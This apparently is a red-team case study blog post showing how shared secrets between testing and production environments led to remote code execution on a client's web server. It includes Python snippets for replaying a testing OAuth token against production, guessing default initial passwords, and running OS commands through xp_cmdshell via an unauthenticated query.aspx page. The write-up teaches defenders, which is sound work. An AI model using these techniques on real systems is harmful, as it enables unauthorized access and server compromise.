How a Lack of Environment Separation Led Our Red Team to Remote Code Execution

A lack of separation between testing and production environments is something we see often during our Red Team operations and Penetration Testing assessments, and it is something we regularly report to our customers. However, it is an issue that doesn’t always get the attention it deserves. This case study offers insights into one such scenario and showcases how we were able to turn a lack of environment separation into remote code execution on one of our client’s web servers.

What is Environment Separation?

The concept of environment separation refers to the practice of ensuring distinct boundaries between different computing environments, such as development, testing, and production. This separation acts as a safeguard to prevent inadvertent data leaks, software bugs, or malicious code from crossing from one environment to another; it is, in essence, a defense-in-depth strategy that can contain an attacker’s impact. For instance, a vulnerability introduced to a development server could inadvertently put the production environment at risk.

Environment separation goes a few steps beyond just making sure testing applications and production applications are on different servers. Security best practices suggest (and so do we) that the separation include splitting cloud environments into different accounts and using different administrative access (i.e., the admin credentials for the testing environment should be different from the admin credentials for production). Perhaps the most common mistake organizations make is failing to separate secrets such as cryptographic keys and access tokens.
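As a trivial illustration of that last point, per-environment secrets can be kept apart with nothing more than environment-scoped configuration. The sketch below is a generic example, not the client’s setup; the environment variable names are placeholders.

```python
import os

# Each deployment environment gets its own, unrelated secrets.
# Reusing the same key or token across environments turns any
# testing-environment compromise into a production compromise.
ENVIRONMENT = os.environ.get("APP_ENV", "testing")

SECRETS = {
    "testing": {
        "api_token": os.environ.get("TEST_API_TOKEN"),
        "cookie_signing_key": os.environ.get("TEST_COOKIE_KEY"),
    },
    "production": {
        "api_token": os.environ.get("PROD_API_TOKEN"),
        "cookie_signing_key": os.environ.get("PROD_COOKIE_KEY"),
    },
}[ENVIRONMENT]
```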

Let’s mix our environments – what could possibly go wrong?

Our story begins in a Red Team engagement that we conducted for a large-scale customer in the transportation sector. The client gave us a very wide scope containing a few hundred assets (IPs and subdomains). The Rules of Engagement allowed everything except phishing and physical access (and obviously things like DoS were off the table). With that in mind, we began our Red Team operation with some recon.

Note – the names, addresses, and some details in this case study have been altered to avoid exposing sensitive information.

Our recon phase led us to a few interesting web applications that, judging by their tech stack, looked quite old and possibly vulnerable, so we decided to target those first. We quickly realized that one of the web applications’ admin panels was accessible with guessable credentials. After gaining initial access to the admin panel, we learned that this web application stored documentation about how to access the REST APIs of other services (that were in scope). The information included descriptions of the APIs and a few OAuth 2.0 access tokens. But alas, when we pulled user data by invoking some of these APIs, we saw that we were accessing data belonging to a testing environment, containing only usernames like [email protected]. It turned out the documentation covered services that were still in development or testing environments, so the information was quite useless… or was it?

If you have experience with hacking systems (or you just read the title), then you can probably see where we are going with this. After coming to a dead end with the testing usernames we found, we decided to target those same REST APIs, but on the production system. The problem was that we only had access tokens for the testing environment. We didn’t have a better lead, so we decided to try the access tokens against the production system. We invoked the method /app/listUsers on the domain prodrest.target.com (production) by simply changing the host in the HTTP request from testrest.target.com (testing), using the same access token that worked on the testing environment. To our amazement, this worked on the first try and we managed to pull a bunch of production usernames!
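The request itself was trivial. Below is a minimal sketch of the idea, assuming a standard bearer-token REST API; the token value is a placeholder, and the response handling is illustrative rather than the exact tooling we used.

```python
import requests

# OAuth 2.0 access token harvested from the documentation site.
# It was issued for the *testing* environment (testrest.target.com).
TEST_TOKEN = "<redacted-test-environment-token>"

headers = {"Authorization": f"Bearer {TEST_TOKEN}"}

# Same API method, same token -- only the host changes from testing to production.
for host in ("testrest.target.com", "prodrest.target.com"):
    resp = requests.get(f"https://{host}/app/listUsers", headers=headers, timeout=10)
    print(host, resp.status_code)
    if resp.ok:
        print(resp.json())  # the production host happily returned real usernames
```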

Expanding Our Access

After some poking and prodding we discovered which web application those downloaded users belonged to. It turns out the users belong to an employee-only ticketing system on ticketing.target.com. We also found out that new users have a guessable initial password that needs to be changed on the first login. Combining these two facts, we were able to identify a few users who had never performed an initial login. So, with the help of a few custom-written tools, we managed to guess their initial password and log in on their behalf – a risky move, but we had good indications that the system would not alert anyone about the logins (we also had pre-approval to do this).
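For illustration, a stripped-down version of that kind of tooling might look like the sketch below. The login endpoint, parameter names, initial-password pattern, and success heuristic are all hypothetical placeholders; the real ones are specific to the client’s application.

```python
import requests

# Hypothetical initial-password pattern and login endpoint -- placeholders only.
LOGIN_URL = "https://ticketing.target.com/login"
INITIAL_PASSWORD = "Welcome2023!"

def try_initial_login(username: str) -> bool:
    """Attempt a login with the guessable initial password.

    A success strongly suggests the user never completed their first login
    (and therefore never changed the default password).
    """
    resp = requests.post(
        LOGIN_URL,
        data={"username": username, "password": INITIAL_PASSWORD},
        allow_redirects=False,
        timeout=10,
    )
    # Assumption: a successful login redirects to the dashboard instead of
    # re-rendering the login page.
    return resp.status_code == 302

# Usernames pulled from the production REST API in the previous step.
candidates = ["j.doe", "a.smith", "b.jones"]
for user in candidates:
    if try_initial_login(user):
        print(f"[+] {user} still has the initial password")
```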

At this point we had already achieved something significant – we had access to several accounts on the employee-only ticketing web application. Our Penetration Testing background has taught us that systems designed to be internal-facing only, i.e., accessible only to the company’s employees, are usually less secure than their publicly facing counterparts and can be riddled with security vulnerabilities. This is usually because organizations place higher trust in their employees and assume that the risk from these “internal” systems is negligible. As a result, these systems are not regularly (if ever) tested for vulnerabilities.

We logged into the web application as one of the stolen users and began looking for vulnerabilities. After careful inspection of the JavaScript files, we managed to identify an intriguing, hidden ASPX file called query.aspx. The page, as the name suggests, allows admins to send arbitrary SQL queries to the database by design, but when we tested the feature (which lacked access restrictions), we were disheartened to discover that the functionality was disabled.

Most hackers would probably spend a few hours or days looking for other vulnerabilities on the ticketing website, but sometimes a better method is to take a step back, take a deep breath, think about the mistakes IT teams and developers make, and approach the problem holistically and creatively.

Lack of Separation strikes again!

We knew by now that the organization likes to keep a testing version of each web application, so maybe in the testing version of the ticketing web application, the query.aspx page isn’t disabled? But there was an obstacle: we didn’t have users for the testing environment… unless… unless both environments use the same cryptographic material to generate their session cookies? If so, we might be able to use our working session cookie from the production web app on the testing web app.

So we took our HTTP request to query.aspx from Burp, with the payload as-is, changed only the Host HTTP header, and retargeted it against the testing version of the ticketing website (tst-ticketing.target.com) – IT WORKED! We confirmed that we had access to the web application in both testing and production using the same cookie, and that query.aspx wasn’t disabled in the testing environment! Using the SQL querying functionality we managed to find some sensitive internal information, but the icing on the cake was that the MSSQL server in the testing environment was misconfigured to allow xp_cmdshell. In other words, it allowed us to send OS-level commands through the querying service and gain remote code execution on the target.
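To make that final step concrete, here is a rough sketch of what the request chain looked like, assuming query.aspx accepts the SQL statement as a POST parameter. The cookie name (typical for ASP.NET forms authentication), the parameter name, and the cookie value are assumptions and placeholders, not the client’s real ones.

```python
import requests

# Session cookie obtained by logging into the *production* ticketing app.
# Because both environments share cryptographic material, the same cookie
# is accepted by the testing instance. Cookie name is an assumption.
COOKIES = {".ASPXAUTH": "<production-session-cookie>"}

# xp_cmdshell lets us run OS commands through the SQL Server instance.
SQL = "EXEC xp_cmdshell 'whoami';"

resp = requests.post(
    "https://tst-ticketing.target.com/query.aspx",  # testing host, production cookie
    cookies=COOKIES,
    data={"query": SQL},  # hypothetical parameter name
    timeout=15,
)
print(resp.text)  # output of the OS command, demonstrating remote code execution
```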

So, to sum up, we were able to chain the following vulnerabilities in order to gain RCE:

  1. Default credentials on the documentation website.
  2. Plaintext secrets on the documentation website (OAuth 2.0 access tokens).
  3. Shared access tokens between testing and production sites (on the REST API).
  4. Guessable initial user passwords for the ticketing website.
  5. Shared cryptographic material between testing and production sites (for the ticketing web apps).
  6. Dangerous SQL functionality running on the web server (query.aspx).
  7. Missing authorization on query.aspx.
  8. Improperly hardened MSSQL (xp_cmdshell allowed).

Final thoughts

  1. While this attack scenario may seem unique, our experience tells us that this pattern of attack is quite common and is often how organizations get compromised. At a high level, the pattern is this:
    1. Attacker gains limited access to an obscure system (something the organization’s security team isn’t paying much attention to).
    2. Attacker chains this access with some other vulnerability they discover to elevate their privileges.
    3. Attacker moves laterally to gain access to more systems and more information.
    4. Repeat this process until the organization is compromised.
    5. Profit.
  2. This case study shows the real-world impact of exploiting a lack of environment separation, something that many organizations only partially enforce, or sometimes entirely neglect. If, in this case, the OAuth 2.0 access tokens had not been shared between the testing and production REST services, our Red Team operation might have been forced to find another route in.
  3. While it is understandable that an internal, employee-only web app gets less attention from security teams, it is vital that security assessments are still performed on it.